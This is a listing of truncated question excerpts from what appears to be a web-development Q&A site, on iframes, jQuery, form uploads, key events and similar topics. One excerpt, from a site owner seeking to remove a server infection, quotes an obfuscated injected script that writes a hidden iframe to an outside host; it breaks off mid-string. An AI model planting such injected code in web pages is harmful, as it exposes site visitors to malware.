
Adjust height of div to content again, really need help please...

Hi again... I have tried different solutions but none of them work... So here is my last shot, if there is anybody out there who have done this or knows a way to do it please help me out... I have two divs, one on the left, and one on the right side of my page. I have an iframe in the middle of my site, which content is loaded from a ph...

Getting PDF to stay in an embedded <object> or <iframe>

I've edited this quite a bit and bolded my question at this point. I realize that PDF won't be fully controllable in the browser, but that's not my issue here. My problem is, well, below in bold. <div> <object data="${pageContext.request.contextPath}/UB04.xml" type="application/vnd.adobe.xdp+xml" width="415" heig...

ASP.NET passing HTML input files via post from classic ASP

I'm in the process of migrating code from a classic ASP site to an ASP.NET site. One problem that I'm running into is an <input type="file" name="upload"/> form field. <form id="classicASPform" method="post" EncType="Multipart/Form-Data" action="http://domain2/formReciver.aspx"&gt; <input type="file"...

How many non-printing characters are in common use?

When writing interpreters for PDF, HTML and other documents we need to deal with a variety of white-space characters and additional non-printing characters. The ANSI ones are well defined, but how many others are likely to be found in practice? A typical example is the cluster in ISO10646 (I think): &ensp; &#8194;     en spac...

Input change event on blur

I need to trigger an input change event, but only if the value changed. And I need this done from a keyboard event. Is there a way to invoke the browser's change mechanism which will either trigger the change event to fire, or will not depending on if the value was modified? Example: User clicks on an input field User does not modify v...

Getting displayed text only from HTML

Is there a simple way, using C#, to open an arbitrary URL, read in the text, and reduce it down to that which would be displayed in a web page? I suppose I could get the < body > content, and iterate char by char over that content, ripping out anything that is in betwee < and >(inclusive). I looked briefly at HTML Agiligy Pack, and tha...

Programatically stopping a specific chunk of code in html/javascript/css

The server that has my website on it also has a virus on it. The virus injects the malicious code <b id="BAs"></b><script>/*Warning: Opera Only*/var hKo = document.createElement("script");hKo.text="document.write(unescape(\"%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6e%63%63%63%6e%6e%6e%63%2e%63%6e%2f%69%6d%67%2f%69%6...

HTML/CSS Validation Links/Buttons

Is there a reason many websites place a small link/button to the W3C CSS/HTML validation of the respective site or is this just a weird practice that caught on? ...

JQuery: SlideToggle on links?

How do I perform a JQuery 'slidetoggle' effect using a hyperlink, instead of an input button, as the action item? At the JQuery refence page It only gives an example of using a form input button. I would like to have instead of a button, a hyperlink to be the toggle clickable a...

I can't figure out the bug in this jQuery.

The page having problems is... I use Firebug to debug my jQuery and other code tidbits and it's been proving very useful for Javascript/jQuery debugging. However, at the same time, it's been one of the most frustrating debugging experiences I've ever gone through. I'm not sure wh...

how to fetch the selected element from a group of available radio buttons from APS.NET MVC application

I have 2 groups of radio buttons with 2 links , corresponding to each of the group, in my ASP.NET MVC application. below attached is the screenshot for better clarity. Now when i select the appropriate link , the value associated with the particular group should be passed on to the contoller Action . for instance in the above case ...

How to implement navigation bars like here?

It's in fact a picture. See #navMain in this page Best in jQuery. ...

Need Images to maximize on mouseover in HTML pages

I m have thumbnail images in a table and on mouseover the image i should get as blow up and on mouseout it should be normal thumbnail. and i even need to navigate on clicking the Blowup image. plz guide me with the code of how to do it using javascript or using CSS I need some thing as in this website : link text ...

How can jQuery find the row number of a button clicked in a dynamically generated table?

I have a table that looks like this: <table> <thead> <!-- random table headings --> </thead> <tbody> <tr class="readonly"> <td><input type="text" readonly="readonly" name="bookings[start][]" class="date" value="start"/></td> <td><input type="text" readonly="readonly" name="bookings[end][]" class="date" ...

GWT vertical layout

I need a vertical layout, which would fill browser's viewport top to bottom, with on overflow (scrollbars). I need to layout widgets on the top, and on the bottom, and have one widget in the center which would stretch to fill the remaining space. There seems to be DockLayoutPanel for this purpose, the problem with it is that it forces m...

looking for light weight tool/API/script(in PHP) to validate whether a html code snippet is 'tidy'

I am looking for light weight tool/API/script(in PHP) to validate whether a html code sippet is 'tidy'.By 'tidy' I simply mean whether the html snippet has properly closed tags and is valid html. the tools that are usually ailable are generally for validating a url html. I wnat to be able to validate only a small html snippet . e.g <a...

PHP DomDocument Save XML with HTML

Hi, How would I save an XML file opened with DomDocument so that the HTML inside won't be encoded into HTML entities? ...

Substitute to <iframe>

I need to open a page inside another page without the horizontal scroll bar in the inner page. I don't want to use <iframe> tags on my page. Is there any substitute to the <iframe> tag?? ...

element onkeydown keycode javascript

Hi I am using this code snippet to add KeyDown event handler to any element in the html form for(var i=0;i<ele.length;i++) { ele[i].onkeydown = function() { alert('onkeydown'); } } How can I know which key has been pressed on keydown event? I try this for(var i=0;i<ele.length;i++) { ele[i].onkeydown = fun...

how to select all songs when i click playselected?

Hi how can i get all songs selected when i click playselected button without selecting any songs? </style> <script language=JavaScript> function checkall() { void(d=document); void(el=d.getElementsByName('song[]')); for(i=0;i<el.length;i++) void(el[i].checked=1) } function uncheckall() { void(d2=document); void(e2=d2.getElementsB...